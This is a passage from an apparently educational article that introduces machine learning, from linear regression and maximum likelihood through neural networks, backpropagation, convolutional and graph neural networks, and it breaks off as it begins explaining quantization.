<p><strong>Supervised learning algorithms</strong>, on the other hand, have access to a dataset but each element of that set has an associated <em>label</em>. For example, for a simple image classification task of animals, each image needs to have a label which specifies the animal that is the target of the classification.</p>

<p>Other learning paradigms exist such as semi-supervised learning and <em>reinforcement learning</em>. The former is when some examples in the dataset include supervision targets while others do not, while the latter is when the learning algorithm interacts with an environment, so there is a feedback loop between the learning system and its actions.</p>

<h4 id="example-linear-regression">Example: Linear Regression</h4>

<p>To give an example of how a learning algorithm works we walk through possibly the simplest learning algorithm: linear regression.</p>

<p>The goal of linear regression is to build a system that takes in a vector \(\mathbf{x} \in \mathbb{R}^n \) as input and predict the value of a scalar \(y \in \mathbb{R} \) as its output. Let \(\hat{y}(\mathbf{x}_i) \) denote the value that our model predicts \(y \) should be for example \(\mathbf{x}_i \). We define the output to be</p>

<p>\[
    \hat{y}_i = \mathbf{w}^\top \mathbf{x}_i + b\,,
\]</p>

<p>where \(\mathbf{w} \in \mathbb{R}^n \) and the scalar \(b \) are the parameters we are trying to learn. We can think of \(\mathbf{w} \) as the <em>weights</em> and \(b \) as the \(bias \). We can further organize our dataset into a <em>design matrix</em> \(\mathbf{X} \), where the different examples \(\mathbf{x}_i \) are organized in the rows of the matrix, and each column corresponds to a different feature. For simplicity, we can set \(b=0 \). In terms of the design matrix, \(\hat{y} \) becomes a vector \((\hat{\mathbf{y}})_i = \hat{y}_i \) \(\forall i \), and:</p>

<p>\[
    \hat{\mathbf{y}} = \mathbf{X}\mathbf{w}\,.
\]</p>

<p>To make a learning algorithm we need to create an algorithm that can improve the weights \(\mathbf{w} \) in order to improve the performance of the model, when the algorithm is allowed to gain experience by observing the dataset. However, how do you evaluate the performance of the model? One way of doing this is to compute the Mean Square Error (MSE) between the predictions and the actual values:</p>

<p>\[
    \text{MSE} = \frac{1}{m} ||\hat{\mathbf{y}} - \mathbf{y}||^2
\]</p>

<p>\[
    = \frac{1}{m} \sum_{i=1}^m (\hat{\mathbf{y}} - \mathbf{y})_i^2
\]</p>

<p>where \(\mathbf{y} \) are the regression targets, and \(m \) is the size of the set over which we are doing this evaluation. Furthermore, because we want to do a fair evaluation, we want to evaluate our model on examples it has never seen before. This can be achieved by splitting the dataset into a <em>test</em> and a <em>train</em> set. During the learning procedure the algorithm only has access to the training set, and after the end, the model is evaluated solely on the test set.</p>

<p>Therefore, in order to now minimize \(\text{MSE}_ {\text{train}} \), known as the <em>loss function</em>, we can simply solve for where its gradient is \(\mathbf{0} \):</p>

<p>\[
    \nabla_{\mathbf{w}} \text{MSE}_{\text{train}} = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \nabla_{\mathbf{w}} ||\hat{\mathbf{y}}^{\text{(train)}} - \mathbf{y}^{\text{(train)}}||^2 = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \nabla_{\mathbf{w}} ||\mathbf{X}^{\text{(train)}} \mathbf{w} - \mathbf{y}^{\text{(train)}}||^2 = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \nabla_{\mathbf{w}} (\mathbf{X}^{\text{(train)}} \mathbf{w} - \mathbf{y}^{\text{(train)}})^\top (\mathbf{X}^{\text{(train)}} \mathbf{w} - \mathbf{y}^{\text{(train)}}) = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow 2 \mathbf{X}^{\text{(train)}\top} \mathbf{X}^{\text{(train)}} \mathbf{w} - 2 \mathbf{X}^{\text{(train)}\top}\mathbf{y}^{\text{(train)}} = \mathbf{0}
\]</p>

<p>\[
    \Rightarrow \mathbf{w}  = \left( \mathbf{X}^{\text{(train)}\top} \mathbf{X}^{\text{(train)}} \right)^{-1} \mathbf{X}^{\text{(train)}\top}\mathbf{y}^{\text{(train)}}\,,
\]
assuming that \(\mathbf{X}^{\text{(train)}\top} \mathbf{X}^{\text{(train)}} \) is invertible. Evaluating the above equations constitutes a simple learning algorithm. However simple and limited this algorithm may be, it provides a good example of how a classical learning algorithm works.</p>

<p>From the previous example, certainly one question arises: Why did we choose to minimize MSE and not some other function? For each problem, rather than guessing that some function may be appropriate as an estimator, we would like to have a systematic way of deciding its form. The most common such principle is the principle of maximum likelihood, and the method is known as Maximum Likelihood Estimation (MLE).</p>

<h4 id="maximum-likelihood-estimation">Maximum Likelihood Estimation</h4>

<p>We demonstrate the MLE method and give the set of probabilistic assumptions under which least-squares regression is derived as a very natural algorithm <a href="https://cs229.stanford.edu/main_notes.pdf">[Ref]</a>.</p>

<p>Let us assume that, in line with our previous equation for linear regression, the target variables and the input variables are related via the equation</p>

<p>\[
y_i = \mathbf{w}^\top \mathbf{x}_i + \epsilon_i\,,
\]</p>

<p>where \(\epsilon_i \) is the error term that captures random noise, or unmodeled effects. Let us further assume that these terms \( \epsilon_i \), given \(m \) observations, are independent and identically distributed (IID) random variables, and that they follow the Gaussian (or normal) distribution \(\epsilon_i \sim \mathcal{N}(0,\sigma^2) \). The probability density function is therefore as follows</p>

<p>\[
    p(\epsilon_i) = \frac{1}{\sqrt{2 \pi} \sigma} \exp \left(- \frac{\epsilon_i^2}{2 \sigma^2} \right) \,.
\]</p>

<p>This, given that \( \epsilon_i = y_i - \mathbf{w}^\top \mathbf{x}_i \), implies that</p>

<p>\[
    p(y_i | \mathbf{x}_i ; \mathbf{w}) =  \frac{1}{\sqrt{2 \pi} \sigma} \exp \left(- \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right) \,,
\]</p>

<p>the probability that \(y_i \) will take a specific value, given the measurement of an example \(\mathbf{x}_i \) and parametrized by \(\mathbf{w} \).</p>

<p>Now, if we take into account all the measurements \(\mathbf{x}_i \), in other words given the design matrix \(\mathbf{X} \), what is the distribution of the \(y_i \)’s? Since we assumed independence, the probability will be a simple product of the respective probabilities for each observation:</p>

<p>\[
    p(\mathbf{y} | \mathbf{X}; \mathbf{w}) = \prod_{i=1}^m p(y_i | \mathbf{x}_i ; \mathbf{w}) 
\]</p>

<p>\[
    = \prod_{i=1}^m \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right ) \,,
\]</p>

<p>for \(m \) measurements \( \mathbf{x}_i \). We can view this function as a function of \(\mathbf{w} \), and in this case this function is known as the likelihood:</p>

<p>\[
    L (\mathbf{w}) = L (\mathbf{w}; \mathbf{X}, \mathbf{y}) =<br />
\]</p>

<p>\[
    = \prod_{i=1}^m \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right) \,.
\]</p>

<p>Given this probabilistic model for the \(y_i \)’s based on the data points \( \mathbf{x}_ i \), what is the best way to choose the values for the parameters \( \mathbf{w} \)? The <em>principle of maximum likelihood</em> states that the parameters for which the observations are as highly probable as possible should be chosen. This is equivalent to maximizing the likelihood function \(L(\mathbf{w}) \).</p>

<p>The maximization of \(L(\mathbf{w}) \) is equivalent to the maximization of the logarithm of \(L(\mathbf{w}) \), since the logarithmic function is strictly increasing. Hence, we want to maximize the log likelihood \(l(\mathbf{w}) \):</p>

<p>\[
    l(\mathbf{w}) = \log L(\mathbf{w})
\]</p>

<p>\[
    =\log \prod_{i=1}^m \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right)
\]</p>

<p>\[
    = \sum_{i=1}^m \log \frac{1}{\sqrt{2 \pi} \sigma} \exp \left( - \frac{(y_i - \mathbf{w}^\top \mathbf{x}_i)^2}{2 \sigma^2} \right)
\]</p>

<p>\[ 
    = m \log \frac{1}{\sqrt{2\pi} \sigma} - \frac{1}{\sigma^2} \frac{1}{2} \sum_{i=1}^m (y_i - \mathbf{w}^\top \mathbf{x}_i)^2 \,.
\]
Hence, maximizing \(l(\mathbf{w}) \), is equivalent to minimizing</p>

<p>\[
    \sum_{i=1}^m (y_i - \mathbf{w}^\top \mathbf{x}_i)^2 \,,
\]</p>

<p>which we recognize to be our original least-squares (MSE) cost function.</p>

<p>Therefore, under the assumptions of Gaussian IID errors, the least-squares linear regression algorithm corresponds to the maximization of the likelihood function. Depending on the problem at hand, by a similar approach, one can prove that, for example, for a binary classification task, the most appropriate cost function is given by the binary cross entropy <a href="https://www.deeplearningbook.org">[Ref]</a>.</p>

<h4 id="generalization-overfitting-and-underfitting">Generalization, Overfitting, and Underfitting</h4>

<p>Another important challenge in this process, one of the most central ones, is to further make the learning algorithm perform well on the test set, on <em>new, unseen</em> inputs, not only on the dataset that the model was trained on. In other words, we want the model to be able to <em>generalize</em>. In order to decide, whether a model is doing this well, we have to compare the loss on the test set, \(\text{MSE}_ {\text{test}} \) in our example, with the loss on the training set \(\text{MSE}_ {\text{train}} \). If the model is generalizing well, we expect the error on the test set to be roughly the same as the error on the training set. If the model is not generalizing well, we talk about overfitting or underfitting. The former refers to the case where a model corresponds too closely to the dataset it was trained on, and hence performs poorly on new unseen data. The latter refers to the case where a model cannot adequately capture the underlying structure of the data. In Fig. 3, examples of underfitting and overfitting are compared.</p>

<p>Furthermore, if the model’s deviations from the data are, on average, roughly the same size as the measurement uncertainties of the data points, that means the ML model is doing a “good-enough” fit of the data—i.e., it’s actually fitting the signal and not the noise. On the other hand, if the residuals are significantly smaller than the measurement uncertainties, this indicates that the model is also fitting random fluctuations and thus overfitting.</p>

<p><img src="/assets/ml-gnn-intro/underfitting-overfitting.png" alt="underfitting-overfitting" /></p>

<p><strong>Figure 3:</strong> Examples of underfitting and overfitting on a synthetically generated dataset with quadratic structure. Left: A linear fit cannot capture the curvature present in the data. Center: A quadratic fit generalizes well to unseen points and hence does not suffer from a significant amount of either underfitting or overfitting. Right: A polynomial fit of degree 19 suffers from strong overfitting. The solution passes exactly through many points in the dataset, however, the structure has not been correctly extracted, and the performance on unseen data will be poor.</p>

<h2 id="deep-learning">Deep Learning</h2>

<p>Deep feedforward networks, also known as MLPs, are the archetype of deep learning models. They are called deep because they have several layers and feedforward because of how the information is progressively fed into the successive layers, flowing towards the output. The term neural is a remnant of the models’ origins in neuroscience, specifically the McCulloch-Pitts neuron <a href="https://doi.org/10.1007/BF02478259">[Ref]</a>, a simplified model of the biological neuron that can be used as a form of computing element. However, the modern use in deep learning no longer draws these parallels from biology. Finally, these models are called networks because they are typically represented by combining and chaining various neurons together.</p>

<p>A feedforward neural network with three hidden layers is shown in Fig. 4. In our example, input, hidden and output layers have \(n \), \(m \) and \(k \) units, respectively. Moreover, we can see that the network is fully-connected since every neuron of a layer is connected to every neuron in neighboring layers.</p>

<p><img src="/assets/ml-gnn-intro/nns.png" alt="nns" /></p>

<p><strong>Figure 4:</strong> Illustration of a deep feedforward neural network, highlighting its input, output and hidden layers. Adapted from <a href="https://tikz.net/neural_networks/">[Ref]</a>.</p>

<p>One way to understand neural networks is to consider the limitations of linear models. The obvious problem with linear models is that they are limited to linear functions. In order to extend linear models to approximate nonlinear functions of \(x \), we can apply the linear model not to \(\mathbf{x} \) itself but to a transformed input \(\phi(\mathbf{x}) \), where \(\phi \) is a nonlinear transformation. We can think of this function \(\phi \) as providing a new representation of \(\mathbf{x} \).</p>

<p>So how can this nonlinear transformation \(\phi \) be chosen? We already saw that in classical ML approaches, this is hand-crafted by the engineer. However, here, since deep learning is a type of representation learning, the goal is to learn this transformation \(\phi \). If we assume that this transformation depends on some set of parameters \(\mathbf{w} \), then we can learn what these parameters have to be for a good representation.</p>

<p>So how do we do this? We start from our input say \(\mathbf{x} \). For linear regression, we had:</p>

<p>\[
    f(\mathbf{x}; \mathbf{w},b) = \mathbf{x}^\top \mathbf{w} + b\,.
\]</p>

<p>The output of this model is a scalar even though the input is a vector. However, if we wanted a multidimensional output, where the linear parameters \(\mathbf{w} \) are different for each dimension, we can organize the parameters in a matrix \(\mathbf{W} \) such that:</p>

<p>\[
    \mathbf{h}(\mathbf{x}; \mathbf{W}, \mathbf{b}) = \mathbf{W} \mathbf{x} + \mathbf{b}\,,
\]</p>

<p>where now we have a different bias, i.e., additive constant, \((\mathbf{b})_i \) for each output dimension.</p>

<p>Finally, to overcome the defect of linear models, we use a nonlinear function after this affine transformation. This nonlinear function is known as the <em>activation function</em> and can be denoted by \(\mathbf{g} \). Therefore, our model now is as follows:</p>

<p>\[
    \mathbf{h}(\mathbf{x}; \mathbf{W}, \mathbf{b}) = \mathbf{g} (\mathbf{W} \mathbf{x} + \mathbf{b} ) \,,
\]</p>

<p>where \(\mathbf{g} \) is element-wise. The nonlinear function \(\phi \) now comprises an affine transformation based on the learnable parameters \(\mathbf{W} \) and \(\mathbf{b} \), and a fixed nonlinear function \(\mathbf{g} \). The parameters are adjusted during training, while the form of the activation \(\mathbf{g} \) is chosen beforehand. These operations are also summarized in Fig. 5.</p>

<p><img src="/assets/ml-gnn-intro/nn_operations.png" alt="nn_operations" /></p>

<p><strong>Figure 5:</strong> The operations between the input and the first hidden layer. Weights are denoted as \(w \), biases as \(b \), and the activation function as \(g \). The element-wise, vector version of the activation is denoted by \(\mathbf{g} \). Adapted from <a href="https://tikz.net/neural_networks/">[Ref]</a>.</p>

<p>Various popular activations are plotted in Fig. 6. ReLU has only nonnegative values and is defined as \(\text{ReLU}(x) = \max(0,x) \). It is computationally efficient and mitigates the vanishing gradient problem, making it the default activation for various deep learning architectures. However, it suffers from the so-called “dying ReLU” problem, where neurons can become completely inactive and only output zero for all inputs.</p>

<p>The sigmoid function is defined as \(\sigma (x) = 1/(1+e^{-x}) \), taking values between 0 and 1. While historically important, sigmoid activations are prone to the vanishing gradient problem for large absolute values of the input, which can hamper the training of deep networks, unless intermediate layers designed to avoid this are introduced.</p>

<p>The hyperbolic tangent is defined as \(\tanh (x) = (e^x - e^{-x} )/(e^x + e^{-x}) \) so the function takes values between \(-1 \) and 1. The function is zero-centered which can help with convergence compared to the sigmoid. Nonetheless, it still suffers from vanishing gradients for large inputs.</p>

<p>Finally, the swish function \(\text{swish} (x) = x/(1+e^{-x}) \) <a href="https://doi.org/10.48550/arXiv.1710.05941">[Ref]</a> is an attempt to interpolate between the linear function and the ReLU function. Swish has been shown to outperform ReLU in some deep architectures, especially in deeper models. However, it is computationally more expensive, which can be a serious drawback in resource-constrained settings.</p>

<p><img src="/assets/ml-gnn-intro/activations.png" alt="activations" /></p>

<p><strong>Figure 6:</strong> Popular activation functions.</p>

<p>A neural network is nothing more than a chain function of these successive transformations. So, for a \(k \)-layer neural network that returns a scalar, the combined action of the neural network \(f_{\text{NN}} \) on an input \(\mathbf{x} \) is simply:</p>

<p>\[
    y = f_{\text{NN}} (\mathbf{x}) = f_k ( \boldsymbol{f}_{k-1} ( \cdots \boldsymbol{f}_2 ( \boldsymbol{f}_1 ( \mathbf{x})))) \,,
\]</p>

<p>where \(\boldsymbol{f}_l \),  for the layer index \(l = 1,…,k-1 \), are functions with vector output of the form:</p>

<p>\[
    \boldsymbol{f}_l (\mathbf{z}) = \mathbf{g_l} (\mathbf{W}_l \mathbf{z} + \mathbf{b}_l) \,,
\]</p>

<p>where \(\mathbf{W}_l \) are the weights between layers \(l \) and \(l-1 \), \(\mathbf{g_l} \) and \(\mathbf{b}_l \) are the activation and biases, respectively, of layer \(l \),
while \(f_k \) returns a scalar.</p>

<p>The remarkable result of the universal approximation theorem <a href="https://doi.org/10.1016/0893-6080(89)90020-8">[Ref]</a> states that, under mild assumptions on the activation functions used for the neural network, any continuous function \(f : [0, 1]^n \rightarrow [0, 1] \) can be in fact approximated arbitrarily well by a neural network with <em>as few as one</em> hidden layer and with a finite number of weights. By adding more layers, we are increasing the complexity of the model and hence its capacity to approximate a complex function, as well as to generalize. At the same time, however, we are increasing the computational cost of the algorithm, and therefore, the development of DL models is always a trade-off between these two aspects. By learning the parameters of these models, we essentially can learn how to solve any task, along the representations needed for this specific task.</p>

<p>In order for the learning process to happen, a loss function, similarly to the MSE loss in our linear regression example, is needed. Depending on the problem, a suitable form can be chosen using the MLE method. The weights and biases have then to be chosen such that this function is minimized. This is most frequently done using a form of gradient-based optimization.</p>

<h4 id="gradient-based-optimization">Gradient-Based Optimization</h4>

<p>Optimization, in general, refers to the minimization or maximization of <em>objective function</em> \(J \), a more general term for what we have been calling the loss function so far. In more general optimization problems—including reinforcement learning and economic modeling—the objective function may take a different form from the loss functions encountered previously, and the goal may instead be to maximize it, such as maximizing a reward signal or economic profit.</p>

<p>For the case of neural networks, we are minimizing the prediction error of the model and this objective function is called a loss function. It is a smooth differentiable function of the parameters \(\boldsymbol{\theta} \) of the model. In addition, even though it has multiple inputs, for the concept of “minimization” to make sense, there must be only one output, i.e., \(J : \mathbb{R}^n \rightarrow \mathbb{R} \). In order to minimize \(J(\boldsymbol{\theta}) \), we need to find the direction, in the \(n \)-dimensional parameter space, that \(J \) decreases the fastest and move in this direction. Since, by the definition of the gradient, \(\nabla_{\boldsymbol{\theta}} J (\boldsymbol{\theta}) \) gives the direction in which \(J \) increases the fastest, we have to update \(\boldsymbol{\theta} \) by going in the opposite direction:</p>

<p>\[
    \boldsymbol{\theta} \leftarrow \boldsymbol{\theta} - \alpha \nabla_{\boldsymbol{\theta}} J(\boldsymbol{\theta}) \,,
\]</p>

<p>where \(\alpha \) controls the size of the step in this direction and is known as the learning rate. This method proceeds in <em>epochs</em>. An epoch consists of using the entire training dataset to update each parameter. This iterative optimization algorithm is known as <em>gradient descent</em>.</p>

<p>Depending on the size of the dataset, one epoch could be too time consuming for the purposes of developing an ML model. In that case, a family of methods known as Stochastic Gradient Descent (SGD) can be used. For example, instead of using the entire dataset for the parameters updates above, we can sample a <em>mini-batch</em> of data drawn uniformly from the training set. The convergence to a local minimum is thus noisier but significantly faster. At the same time, using this method during training, non-optimal local minima can be avoided.</p>

<p>The process for two learnable parameters is visualized in Fig. 7. Different trajectories can lead to different local minima, potentially resulting in qualitatively distinct outcomes. This problem can be mitigated using optimized versions of these algorithms, with, for example, a variable learning rate. A frequently used example, is the Adam optimizer <a href="https://doi.org/10.48550/arXiv.1412.6980">[Ref]</a>. It combines an adaptive learning rate with momentum, which accumulates a moving average of past gradients to sustain optimization in consistent directions, thereby reducing the risk of stalling in small local minima or flat regions (plateaus) of the loss landscape. In this way, convergence is accelerated and robustness is improved across a wide range of tasks.</p>

<p><img src="/assets/ml-gnn-intro/sgd.png" alt="sgd" /></p>

<p><strong>Figure 7:</strong> Illustration of gradient descent in a two-dimensional parameter space. Different trajectories may lead to different local minima, and hence may give qualitatively different results. Figure from <a href="http://offconvex.github.io/2018/11/07/optimization-beyond-landscape/">[Ref]</a>.</p>

<p>The next question that arises is the following. Since we said our neural network is essentially a complex nested function of these combinations of nonlinear activations and affine transformations, that means that the loss function is going to have a similar structure. So, how do we know how to update the individual parameters of each layer of the neural network, in order to minimize this objective function?</p>

<h4 id="backpropagation">Backpropagation</h4>

<p>When we use a feedforward neural network that accepts an input \(\mathbf{x} \) and produces an output \(\mathbf{y} \), information flows “forward” through the network, as in from left to right in Fig. 4. The input vector \(\mathbf{x} \) provides the initial information that propagates, layer by layer and finally results in \(\mathbf{y} \). This vector \(\mathbf{y} \) is a function of all the weights and biases of all the layers of the neural network, denoted collectively as \(\boldsymbol{\theta} \). This process is known as forward propagation. A scalar cost function \(J(\boldsymbol{\theta}) \) can then be formed using the output \(\mathbf{y} \).</p>

<p>The backpropagation algorithm, is the reverse process where the information from the cost \(J(\boldsymbol{\theta}) \) flows “backward”, i.e., from right to left in Fig. 4, through the network in order to compute the gradients needed for the parameter updates. Essentially, it is an efficient application of the chain rule to neural networks. Backpropagation computes the gradient of a loss function with respect to the parameters of the network for a single input-output example by applying the chain rule layer by layer in reverse order. This backward iteration avoids redundant calculations of intermediate derivatives and is related to dynamic programming, as it reuses intermediate results in order to improve efficiency <a href="https://www.deeplearningbook.org">[Ref]</a>.</p>

<p>Strictly speaking, the term backpropagation refers only to the algorithm used for this computation and does not include how the computed gradients are used. The term however, is often used loosely to refer to the entire learning algorithm, including the parameter updates we saw earlier.</p>

<h2 id="convolutional-neural-networks">Convolutional Neural Networks</h2>

<p>Convolutional neural networks are a special kind of deep learning model, especially suited to image data. When the training data are images, the input is high-dimensional. Even for a low resolution image of 256 by 256, the input would have to be of size \(256 \times 256 = 65\,536 \). At this size, using a fully connected feedforward neural network to process the input starts being problematic. In addition, by treating the pixels essentially as a vector, we lose information about the “local structure” of the image. Apart from the value of the pixel itself, there is a significant amount of information in the placement of the pixels relative to each other. Going back to our earlier example, even by changing the value of the pixel colors, one could still understand whether a photo depicts a grass field or not. The information of the texture of the grass is somehow encoded in how the relative values of the pixels are arranged together to form the edges that correspond to the grass blades, and the patterns in general, which together convey the texture and structure typical of a grass field.</p>

<p>In order to capture this local structure of the image, the idea is to instead of flattening the input into a vector, to process it in its original, matrix-like, form. To make this easier, we can split the image into small square patches, of equal size. Each patch can then be processed to extract meaningful local features. In practice, this is done using shared filters, also known as kernels, that learn to detect patterns relevant to the task. How can this really be done?</p>

<p>In order to preserve the local structure, we organize the learnable parameters of the model in a matrix \(\mathbf{F} \), for “filter”, of size equal to the size of the patches. We then perform the <em>convolution</em> of the filter matrix \(\mathbf{F} \), across the original image using a moving window approach, as illustrated in Fig. 8. The pixels of the patch are multiplied element-wise into a scalar, and then the bias is added. The output of this operation is sometimes referred to as the feature map. Like before, a nonlinearity is applied to the output, typically the ReLU activation. The learnable parameters of this algorithm are the values of the matrix “filter” as well as the value of the “bias”.</p>

<p><img src="/assets/ml-gnn-intro/conv.png" alt="conv" /></p>

<p><strong>Figure 8:</strong> Illustration of the process of convolving a filter across an image using a sliding window approach. Inspired by <a href="https://themlbook.com">[Ref]</a>.</p>

<p>This operation is performed for a number \(k \) of filters, in order to extract various features in the image, and each filter’s parameters are completely independent. The output for each filter is different, and hence the operation of this convolutional layer results in a collection of \(k \) feature maps. This collection can be thought of as a higher-dimensional tensor and is called a volume. For color images, the input is actually also a volume, since the image is usually represented by three channels: R (red), G (green), and B (blue), where each channel is a monochrome picture.</p>

<p>In a convolutional layer with a multi-channel input volume, the operation is similar to the single-channel case. The convolution of a patch from a multi-channel volume is equal to the sum of the convolutions of the corresponding patches from each individual channel.</p>

<p>By applying various convolutional layers in sequence, the model can learn hierarchical representations of data, starting from low-level representations such as edges in images, all the way to high-level features such as faces and objects.</p>

<p>Another operation frequently used in CNNs is <em>pooling</em>. It works in a similar way to the convolution, as a filter is applied using a sliding window approach. However, instead of applying a trainable filter, a fixed operation is applied: commonly max pooling (which selects the maximum value) or average pooling (which computes the mean value) within each window. Pooling is used to reduce the spatial dimensions of feature maps, helping to retain the most significant features from the input. This subsampling process lowers the number of parameters, decreases computation time, and helps prevent overfitting, ultimately improving model performance.</p>

<p>A famous and illustrative example of the CNN architecture is shown in Fig. 9. The LeNet-5 architecture <a href="https://doi.org/10.1109/5.726791">[Ref]</a>, designed for digits recognition, is split into two modules: the feature extraction module and the trainable classifier module. For the former, a convolutional layer is combined with a subsampling layer twice, C1-S2 and C3-S4, and then layer C5 creates 120 feature maps of size \(1\times 1 \). These feature maps are then “flattened” into a 1-dimensional vector of size 120. For the classification part, this vector is then fed into the feedforward fully connected layers.</p>

<p><img src="/assets/ml-gnn-intro/lenet.png" alt="lenet" /></p>

<p><strong>Figure 9:</strong> The architecture of LeNet-5, a convolutional neural network for digits recognition, as depicted in the original paper <a href="https://doi.org/10.1109/5.726791">[Ref]</a>. The feature extraction module is illustrated using convolution and pooling operations. The classification is performed in the fully connected layers. The input is images of size \(32 \times 32 \). Layer C1 has 6 feature maps of size \(28 \times 28 \), while layer C3 has 16 feature maps of size \(10\times10 \). After subsampling, layers S2 and S4 reduce the size of the maps by one half. The output is then fed into the fully connected network of layers with 120 and 84 units. Finally, the output of the network is a vector of dimension 10.</p>

<h2 id="graph-neural-networks">Graph Neural Networks</h2>

<p>What happens when the data that we have are not structured in the traditional tabular manner, such as vectors in the case of series, or matrices in the case of images? Furthermore, what happens when our data possess an inherent network structure which we would like to take into account, or even learn about directly?</p>

<p>Networks are ubiquitous—and so are graphs. In many real-world scenarios, it is beneficial to think of data points not in isolation but as part of a web of complex connections: people connected through social interactions, proteins by biochemical interactions, or web pages by hyperlinks. Capturing and using this connectivity is crucial for understanding the underlying relationships and dynamics <a href="https://ieeexplore.ieee.org/book/9205745">[Ref]</a>.</p>

<p>Similarly to images being processed by CNNs, we would like to have an algorithm that can have these complex network structures as input. These structures are known as graphs. In general, a graph is a pair \(G = (V, E) \), where \(V \) is a finite set of vertices (or nodes), and \(E \) is the set of connections (known as edges) between these nodes. Graphs can be further classified into directed and undirected. The former means that the edges have a certain direction, for example, we can go from node 5 to 6, but not the other way around, as illustrated in Fig. 10. The latter means that the connections are only symmetrical and mutual, as illustrated in Fig. 11. In addition, in Fig. 11, we can see that the graph comprises two so-called connected components, i.e., maximally connected subgraphs which are disconnected with each other.</p>

<p><img src="/assets/ml-gnn-intro/graph-dir.png" alt="graph-dir" /></p>

<p><strong>Figure 10:</strong> A directed graph with eight vertices and seven edges.</p>

<p><img src="/assets/ml-gnn-intro/graph.png" alt="graph" /></p>

<p><strong>Figure 11:</strong> An undirected graph with eight vertices and seven edges, and two connected components.</p>

<p>Graphs can be represented in various ways. A frequently used representation is the so-called <em>adjacency matrix</em>. The elements of the adjacency matrix \(\mathbf{A} \) are given simply by \( \mathbf{A}_ {ij} = 1 \), if there is a link from node \(i \) to node \(j \), and \( \mathbf{A}_ {ij} = 0 \), otherwise.</p>

<p>The adjacency matrix \(\mathbf{A} \) is therefore symmetric for undirected graphs but not necessarily symmetric for directed ones. Furthermore, the edges themselves, may possess some value based on some characteristic, instead of simply 0 and 1. In this case, the graph is called weighted. Finally, the information associated with the nodes is referred to as <em>node features</em>, while the information associated with the edges is known as <em>edge features</em>.</p>

<p>The question now is the following: How do we take advantage of the relational structure of graphs, in order to achieve better predictions? Drawing inspiration from CNNs, where we wanted to capture the local structure of the pixels in the images, we will try to do something similar. The idea is to do a series of “convolutions”, similar to the ones for images, but this time suited for data with a network structure.</p>

<h3 id="node-embeddings">Node Embeddings</h3>

<p>Similarly to deep learning, we wanted to avoid hand-designing the representations of the problem, and we tried to learn them, in a process that we called representation learning. In the same vein, we will use the same method for our graphs. We will learn node representations, which we will call node embeddings, that will contain information about any node and its connections to neighboring nodes. In this mapping, that can be learned using a neural network, similar nodes in the network are embedded close to each other.</p>

<h3 id="message-passing">Message Passing</h3>

<p>In order to capture and encode inside the node embeddings the connectivity of the network, for each node in the graph, the process is as follows <a href="https://doi.org/10.1109/TNN.2008.2005605">[Ref]</a>.</p>

<ol>
  <li>The embeddings of neighboring nodes are aggregated using a permutation invariant function. This is justified because a permutation of the graph nodes should not give a different result. Examples of these aggregating functions include the max, sum or average functions. This process is referred to as the aggregation of the <em>messages</em> received from the immediate neighbors.</li>
  <li>This aggregated information is then passed through a neural network.</li>
  <li>Finally, the node embedding of the target node is updated based on the aggregated messages from its neighbors. This iterative process of updating the node representations by exchanging information between neighbors is known as <em>message passing</em>.</li>
</ol>

<p>In this way, after each message passing step, the receptive field of the GNN increases by one hop. Hop, here, refers to a traversal from one node of a graph to a neighboring node via a connecting edge. The process is summarized in Fig. 12.</p>

<p><img src="/assets/ml-gnn-intro/aggregate.png" alt="aggregate" /></p>

<p><strong>Figure 12:</strong> Illustration of the process of message passing. Every node defines its own computation graph based on its neighborhood. Left: The input graph and the target node based on which the series of computations is defined. Right: The message passing steps for two hops away from the target node. Gray rectangles represent neural networks. Figure from <a href="https://web.stanford.edu/class/cs224w/">[Ref]</a>.</p>

<p>For a graph \(G = (V,E) \), the message passing layer can also be expressed as:</p>

<p>\[
    \mathbf{h}_ u = \phi \left( \mathbf{x}_ u, \bigoplus_ {v \in \text{Adj}[u]} \psi (\mathbf{x}_ u, \mathbf{x}_ v,\mathbf{e}_ {uv}) \right) \,,
\]</p>

<p>where \(\phi \) and \(\psi \) are differentiable functions representing neural networks, \(\text{Adj}[u] \) is the immediate neighborhood of node \(u \in V \), \(\mathbf{x}_ u \) represents the node features of node \(u \in V \), and \(\mathbf{e}_ {uv} \) represents the edge features of edge \((u,v) \in E \). Finally, \(\bigoplus \) is a permutation invariant aggregation operator (e.g., element-wise sum, mean) accepting an arbitrary number of inputs. Functions \(\phi \) and \(\psi \) are referred to as the update and message functions, respectively.</p>

<p>Other “flavors” of this message passing process have been developed, such as the famous graph convolution networks <a href="https://arxiv.org/abs/1609.02907v4">[Ref]</a> and interaction networks <a href="https://doi.org/10.48550/arXiv.1612.00222">[Ref]</a>.</p>

<p>Having presented these ML models, we now move on to an important technique used in the field of ML/DL: quantization.</p>

<h2 id="quantization">Quantization</h2>

<p>Quantization, in signal processing in general, is the process of mapping a set of values from a continuous set to a finite set. Examples of this include rounding and truncation. In this form, quantization is involved to some extent in nearly all digital signal processing, because the continuous analog signal of any quantity has to be digitized, to discrete values.</p>

<p>In the context of ML/DL <a href="https://huggingface.co/docs/optimum/en/concept_guides/quantization">[Ref]</a>, quantization refers to a process of reducing the size of the models, by representing their weights and activations using numbers with less bits than standard floating-point systems, where 32 or 64 bits are typical. In this way, the computational and memory costs of inference can be reduced significantly. On the one hand the required memory is reduced because simply the space required by each weight is reduced. On the other hand, the operations happen between low-precision data types and hence are considerably less computationally expensive.</p>

<p>As a simple example, let’s consider a symmetric quantization scheme, from 32-bit float to 8-bit integer precision. With 8 bits, only \(2^8 = 256 \) numbers can be represented, while using 32-bit floats, a wide range of values is possible. Let’s consider a float \(x \in [-\alpha,\alpha] \), where \(\alpha \) is a real number with \(\alpha&gt;0 \). How do we best project this symmetric interval \([-\alpha,\alpha] \) of floats onto the space of 8-bit integers? We can write the following quantization scheme:</p>

<p>\[
    x = S \times x_q \,,
\]</p>

